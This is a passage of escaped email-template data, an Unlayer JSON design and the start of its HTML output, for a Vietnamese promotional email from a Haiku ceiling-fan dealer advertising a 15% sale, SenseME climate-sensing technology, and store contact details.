10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a77d6d\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 49px; font-size: 18px;\\\\\\\"><strong>GI\\u00c1M S\\u00c1T C\\u00d4NG NGH\\u1ec6 TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uhMkQt1D2G\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 gi\\u00e1m s\\u00e1t c\\u0103n ph\\u00f2ng \\u00a0\\u0111\\u1ea3m\\u00a0<br \\/>b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m, t\\u1ef1 \\u0111\\u1ed9ng \\u0111i\\u1ec1u ch\\u1ec9nh \\u00a0t\\u1ed1c \\u0111\\u1ed9\\u00a0<br \\/>Haiku khi \\u0111i\\u1ec1u ki\\u1ec7n thay \\u0111\\u1ed5i. N\\u1ebfu th\\u1eddi ti\\u1ebft n\\u00f3ng l\\u00ean\\u00a0<br \\/>SenseME ph\\u00e1t hi\\u1ec7n v\\u00e0 t\\u0103ng t\\u1ed1c \\u0111\\u1ed9 Haiku. M\\u1edf c\\u1eeda\\u00a0<br \\/>s\\u1ed5 v\\u00e0o ban \\u0111\\u00eam v\\u00e0 SenseME s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng gi\\u1ea3m t\\u1ed1c\\u00a0<br \\/>\\u0111\\u1ed9 qu\\u1ea1t khi nhi\\u1ec7t \\u0111\\u1ed9 gi\\u1ea3m.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2z6L5HzXUD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?\\u00a0<a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"> <span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#e1d0c6\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Playfair+Display:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e1d0c6;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e1d0c6;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #e1d0c6;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #a47e6b;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #a47e6b;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  